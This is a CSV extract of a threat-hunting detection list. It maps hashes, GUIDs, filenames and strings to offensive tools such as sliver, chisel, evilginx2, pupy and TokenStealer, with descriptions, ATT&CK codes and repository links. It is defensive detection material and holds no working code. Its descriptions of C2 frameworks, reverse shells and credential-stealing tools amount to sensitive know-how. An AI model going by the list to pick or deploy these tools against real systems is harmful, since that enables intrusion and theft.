TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","N/A","10","10","679","210","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z" "*a9f7d67e29c2b7f2059636c73945b9946185a235dfb12e346e07eb7b0650f714*",".{0,1000}a9f7d67e29c2b7f2059636c73945b9946185a235dfb12e346e07eb7b0650f714.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*aa12c40bc0ef87b1b706f1e9062d72d8c67c3b4b3347741efb38cf71817777d2*",".{0,1000}aa12c40bc0ef87b1b706f1e9062d72d8c67c3b4b3347741efb38cf71817777d2.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","file_hash","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*aa14822e2f2acd7b8aff1ebf1f2e7e9f800f6089f868ec7464af6ac01d7f9b3c*",".{0,1000}aa14822e2f2acd7b8aff1ebf1f2e7e9f800f6089f868ec7464af6ac01d7f9b3c.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*aa3939fc357723135870d5036b12a67097b03309*",".{0,1000}aa3939fc357723135870d5036b12a67097b03309.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*aa3a685af2d72ed748f21a0190d6d08e226f717c8eea6b5694c2ad74a331a285*",".{0,1000}aa3a685af2d72ed748f21a0190d6d08e226f717c8eea6b5694c2ad74a331a285.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*AA488748-3D0E-4A52-8747-AB42A7143760*",".{0,1000}AA488748\-3D0E\-4A52\-8747\-AB42A7143760.{0,1000}","offensive_tool_keyword","SharpADWS","SharpADWS Active Directory reconnaissance and exploitation for Red Teams via the Active Directory Web Services (ADWS)","T1087 - T1069 - T1018 - T1083 - T1595","TA0001 - TA0002 - TA0007","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpADWS","1","0","N/A","7","4","326","30","2024-03-19T08:57:52Z","2024-02-13T17:28:00Z" "*aa5838415ca20f0b6fe7858f457f129cf442940b3d4676cd243575809e53988e*",".{0,1000}aa5838415ca20f0b6fe7858f457f129cf442940b3d4676cd243575809e53988e.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.exe*",".{0,1000}aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\.exe.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","0","N/A","10","10","1077","109","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" "*AAAADkl0J3MgbWUgYnJ1ZGkhAQIDBAUGBw==*",".{0,1000}AAAADkl0J3MgbWUgYnJ1ZGkhAQIDBAUGBw\=\=.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","N/A","10","10","875","126","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z" "*AAABAAMAEBAAAAEAIABoBAAANgAAACAgAAABACAAKBEAAJ4EAAAwMAAAAQAgAGgmAADGFQAAKAAAABAAAAAgAAAAAQAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP39*",".{0,1000}AAABAAMAEBAAAAEAIABoBAAANgAAACAgAAABACAAKBEAAJ4EAAAwMAAAAQAgAGgmAADGFQAAKAAAABAAAAAgAAAAAQAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP39.{0,1000}","offensive_tool_keyword","cuddlephish","Weaponized Browser-in-the-Middle (BitM) for Penetration Testers","T1185 - T1185.002 - T1071 - T1071.001 - T1556 - T1556.001","TA0009 - TA0006","N/A","N/A","Sniffing & Spoofing","https://github.com/fkasler/cuddlephish","1","0","N/A","10","4","311","25","2024-03-28T14:17:28Z","2023-08-02T14:30:41Z" "*AAB4D641-C310-4572-A9C2-6D12593AB28E*",".{0,1000}AAB4D641\-C310\-4572\-A9C2\-6D12593AB28E.{0,1000}","offensive_tool_keyword","SharpEfsPotato","Local privilege escalation from SeImpersonatePrivilege using EfsRpc.","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bugch3ck/SharpEfsPotato","1","0","N/A","10","3","276","43","2022-10-17T12:35:06Z","2022-10-17T12:20:47Z" "*aab70f27573e8f6507ab19843595e8461d5f0e45500bddd6023e5266c123267b*",".{0,1000}aab70f27573e8f6507ab19843595e8461d5f0e45500bddd6023e5266c123267b.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*AAB75969-92BA-4632-9F78-AF52FA2BCE1E*",".{0,1000}AAB75969\-92BA\-4632\-9F78\-AF52FA2BCE1E.{0,1000}","offensive_tool_keyword","Elevator","UAC bypass by abusing RPC and debug objects.","T1548.002","TA0004","N/A","N/A","Privilege Escalation","https://github.com/Kudaes/Elevator","1","0","N/A","10","6","589","68","2023-10-19T08:51:09Z","2022-08-25T21:39:28Z" "*aacf6ed6e4b999a6338d5a025350ea5a*",".{0,1000}aacf6ed6e4b999a6338d5a025350ea5a.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*aaec79f0e98582cc0ae90fa4fc34f134454cd4be0ff4cd3e5078f20b516dc669*",".{0,1000}aaec79f0e98582cc0ae90fa4fc34f134454cd4be0ff4cd3e5078f20b516dc669.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*AAP-AddToHighPrivilegePrincipalMap*",".{0,1000}AAP\-AddToHighPrivilegePrincipalMap.{0,1000}","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/csandker/Azure-AccessPermissions","1","0","AD Enumeration","6","2","103","18","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z" "*AAP-CheckIfMemberOfPrivilegedDirectoryRole*",".{0,1000}AAP\-CheckIfMemberOfPrivilegedDirectoryRole.{0,1000}","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/csandker/Azure-AccessPermissions","1","0","AD Enumeration","6","2","103","18","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z" "*AAP-DisplayApplicableMFAConditionalAccessPolicyForUserID*",".{0,1000}AAP\-DisplayApplicableMFAConditionalAccessPolicyForUserID.{0,1000}","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/csandker/Azure-AccessPermissions","1","0","AD Enumeration","6","2","103","18","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z" "*AAP-DisplayHighPrivilegePrincipalMap*",".{0,1000}AAP\-DisplayHighPrivilegePrincipalMap.{0,1000}","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/csandker/Azure-AccessPermissions","1","0","AD Enumeration","6","2","103","18","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z" "*AAP-DisplayNonHighPrivilegedRoleAssignments*",".{0,1000}AAP\-DisplayNonHighPrivilegedRoleAssignments.{0,1000}","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/csandker/Azure-AccessPermissions","1","0","AD Enumeration","6","2","103","18","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z" "*AAP-GetHighPrivilegedDirectoryRoleTemplateMap*",".{0,1000}AAP\-GetHighPrivilegedDirectoryRoleTemplateMap.{0,1000}","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/csandker/Azure-AccessPermissions","1","0","AD Enumeration","6","2","103","18","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z" "*aardwolf.extensions.RDPEDYC.vchannels.socksoverrdp import SocksOverRDPChannel*",".{0,1000}aardwolf\.extensions\.RDPEDYC\.vchannels\.socksoverrdp\simport\sSocksOverRDPChannel.{0,1000}","offensive_tool_keyword","evilrdp","Th evil twin of aardwolfgui using the aardwolf RDP client library that gives you extended control over the target and additional scripting capabilities from the command line.","T1021.001 - T1056.001 - T1113 - T1078.002 - T1105 - T1090.002 - T1059.001","TA0008 - TA0002 - TA0005 - TA0001 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/skelsec/evilrdp","1","0","N/A","10","10","267","30","2023-12-09T17:10:52Z","2023-11-29T13:44:58Z" "*ab0198fa0310f86c57835809a96f157d2b4c3acccb3f039dba6cfb1af51f5665*",".{0,1000}ab0198fa0310f86c57835809a96f157d2b4c3acccb3f039dba6cfb1af51f5665.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*ab0c5d37cd6817bde34337a51531c6db0dec64577b9c325e38627863c2d9bb97*",".{0,1000}ab0c5d37cd6817bde34337a51531c6db0dec64577b9c325e38627863c2d9bb97.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*ab1b755120b2d5fb3db73f363a0b44881bc8b5e9699e27b804c9806b78de3a1b*",".{0,1000}ab1b755120b2d5fb3db73f363a0b44881bc8b5e9699e27b804c9806b78de3a1b.{0,1000}","offensive_tool_keyword","nimproxydll","A Docker container for byt3bl33d3r/NimDllSideload - DLL sideloading/proxying","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/cyllective/nimproxydll","1","0","N/A","9","1","11","0","2024-03-22T10:29:56Z","2024-03-15T15:15:45Z" "*ab2aacb4caeafc909c788a9ca3cf03202b4f8a6f47dfa759975ac819652fbae4*",".{0,1000}ab2aacb4caeafc909c788a9ca3cf03202b4f8a6f47dfa759975ac819652fbae4.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*ab2c2fad05bea1ece5e7585409c3263dcd14eab456faee47bc9f8a3b866326f1*",".{0,1000}ab2c2fad05bea1ece5e7585409c3263dcd14eab456faee47bc9f8a3b866326f1.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*AB2E1440-7EC2-45A2-8CF3-2975DE8A57AD*",".{0,1000}AB2E1440\-7EC2\-45A2\-8CF3\-2975DE8A57AD.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*ab3fe5644df233ee6c10e09e60c7d8a7fa77aeb9eea8c99fd2a337f28e760258*",".{0,1000}ab3fe5644df233ee6c10e09e60c7d8a7fa77aeb9eea8c99fd2a337f28e760258.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*ab495e19cd0752bcd83ae4f1ae0dff5ab09a756d63b22a64c718f87c04909142*",".{0,1000}ab495e19cd0752bcd83ae4f1ae0dff5ab09a756d63b22a64c718f87c04909142.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*ab606d61d0f3791fc8e0c64507a3210299d66e3bbefbe2101c4f7d8ca64aaf8f*",".{0,1000}ab606d61d0f3791fc8e0c64507a3210299d66e3bbefbe2101c4f7d8ca64aaf8f.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*ab7aa0e4c923f767e50914842239578d36723656befca7bec7d40926bf79c3c3*",".{0,1000}ab7aa0e4c923f767e50914842239578d36723656befca7bec7d40926bf79c3c3.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*ab7d1d288bd6635e9fc098fb1a1b0dee7956ddd5b61b3a8444f0e8c8198e598a*",".{0,1000}ab7d1d288bd6635e9fc098fb1a1b0dee7956ddd5b61b3a8444f0e8c8198e598a.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*ab816e6fa86f08ce0cadd09aa19335b5304f75a55f8fecfe917583650a12fe2c*",".{0,1000}ab816e6fa86f08ce0cadd09aa19335b5304f75a55f8fecfe917583650a12fe2c.{0,1000}","offensive_tool_keyword","COM-Object-hijacking","use COM Object hijacking to maintain persistence.(Hijack CAccPropServicesClass and MMDeviceEnumerator)","T1546.015","TA0003","N/A","N/A","Persistence","https://github.com/3gstudent/COM-Object-hijacking","1","0","N/A","8","1","55","30","2017-08-04T09:19:40Z","2017-08-04T08:15:36Z" "*ab9f2bf9d733a41af5323b5cabe31812d43eef41cb6dcfea9ac47308c91428e3*",".{0,1000}ab9f2bf9d733a41af5323b5cabe31812d43eef41cb6dcfea9ac47308c91428e3.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*ABC32DBD-B697-482D-A763-7BA82FE9CEA2*",".{0,1000}ABC32DBD\-B697\-482D\-A763\-7BA82FE9CEA2.{0,1000}","offensive_tool_keyword","TokenStealer","stealing Windows tokens","T1134 - T1055","TA0003 - TA0004","N/A","N/A","Credential Access","https://github.com/decoder-it/TokenStealer","1","0","N/A","10","2","154","24","2023-10-25T14:08:57Z","2023-10-24T13:06:37Z" "*abeda25578952d37a4fdf1814b55799bc99ebd54643fa7608c34750832deb425*",".{0,1000}abeda25578952d37a4fdf1814b55799bc99ebd54643fa7608c34750832deb425.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*abfd0a70ecabaaa68a9f51b548542577c3859268b352c92cb7d9fa1caf6c3168*",".{0,1000}abfd0a70ecabaaa68a9f51b548542577c3859268b352c92cb7d9fa1caf6c3168.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*abopscript.txt*",".{0,1000}abopscript\.txt.{0,1000}","offensive_tool_keyword","EQGR","Equation Group scripts and tools","T1213.001 - T1203.001","TA0001 - TA0003","N/A","N/A","Exploitation tools","https://fdik.org/EQGRP/Linux/doc/old/etc/abopscript.txt","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*aboul3la*",".{0,1000}aboul3la.{0,1000}","offensive_tool_keyword","Github Username","Github username of pentester known for enumeration tools","N/A","N/A","N/A","N/A","Information Gathering","https://github.com/aboul3la","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*About to download Metasploit payload *",".{0,1000}About\sto\sdownload\sMetasploit\spayload\s.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","0","N/A","10","10","550","143","2023-12-03T10:38:39Z","2016-06-09T10:49:54Z" "*abpttsclient.py*",".{0,1000}abpttsclient\.py.{0,1000}","offensive_tool_keyword","ABPTTS","TCP tunneling over HTTP/HTTPS for web application servers","T1071.001 - T1573","TA0003 - TA0011","N/A","N/A","Persistence","https://github.com/nccgroup/ABPTTS","1","1","N/A","9","8","714","157","2016-08-12T19:36:24Z","2016-07-29T21:45:57Z" "*ABPTTSClient-log.txt*",".{0,1000}ABPTTSClient\-log\.txt.{0,1000}","offensive_tool_keyword","ABPTTS","TCP tunneling over HTTP/HTTPS for web application servers","T1071.001 - T1573","TA0003 - TA0011","N/A","N/A","Persistence","https://github.com/nccgroup/ABPTTS","1","1","N/A","9","8","714","157","2016-08-12T19:36:24Z","2016-07-29T21:45:57Z" "*abpttsfactory.py*",".{0,1000}abpttsfactory\.py.{0,1000}","offensive_tool_keyword","ABPTTS","TCP tunneling over HTTP/HTTPS for web application servers","T1071.001 - T1573","TA0003 - TA0011","N/A","N/A","Persistence","https://github.com/nccgroup/ABPTTS","1","1","N/A","9","8","714","157","2016-08-12T19:36:24Z","2016-07-29T21:45:57Z" "*AbuseGithubAPI*.cpp*",".{0,1000}AbuseGithubAPI.{0,1000}\.cpp.{0,1000}","offensive_tool_keyword","GithubC2","Github as C2","T1095 - T1071.001","TA0011","N/A","N/A","C2","https://github.com/TheD1rkMtr/GithubC2","1","0","N/A","10","10","122","34","2023-08-02T02:26:05Z","2023-02-15T00:50:59Z" "*AbuseGithubAPI*.exe*",".{0,1000}AbuseGithubAPI.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","GithubC2","Github as C2","T1095 - T1071.001","TA0011","N/A","N/A","C2","https://github.com/TheD1rkMtr/GithubC2","1","0","N/A","10","10","122","34","2023-08-02T02:26:05Z","2023-02-15T00:50:59Z" "*ac0a36687a87166b27a9d2f4c041e5131b3aca69ab811086591117bd7f3b7eb3*",".{0,1000}ac0a36687a87166b27a9d2f4c041e5131b3aca69ab811086591117bd7f3b7eb3.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*ac0b5929af1c06ef6d9655a5856c2ac6908c9f4979bd2a7c12f30562fd7f7520*",".{0,1000}ac0b5929af1c06ef6d9655a5856c2ac6908c9f4979bd2a7c12f30562fd7f7520.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*ac22d31fa6c3525c62ae4c2536d27ef042d37a23a76691519bfd72671d313fef*",".{0,1000}ac22d31fa6c3525c62ae4c2536d27ef042d37a23a76691519bfd72671d313fef.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*ac32a19580d4f26d045e8555fb3b9f1415a45af8cbc3a67ea8d9c49dba11cdf1*",".{0,1000}ac32a19580d4f26d045e8555fb3b9f1415a45af8cbc3a67ea8d9c49dba11cdf1.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*ac49d2041cd57b1efba672c3305b621ebb265380010b8951cda01c055a7e1e64*",".{0,1000}ac49d2041cd57b1efba672c3305b621ebb265380010b8951cda01c055a7e1e64.{0,1000}","offensive_tool_keyword","PPLmedic","Dump the memory of any PPL with a Userland exploit chain","T1003 - T1055 - T1564.001","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/itm4n/PPLmedic","1","0","N/A","8","4","317","34","2023-03-17T15:58:24Z","2023-03-10T12:07:01Z" 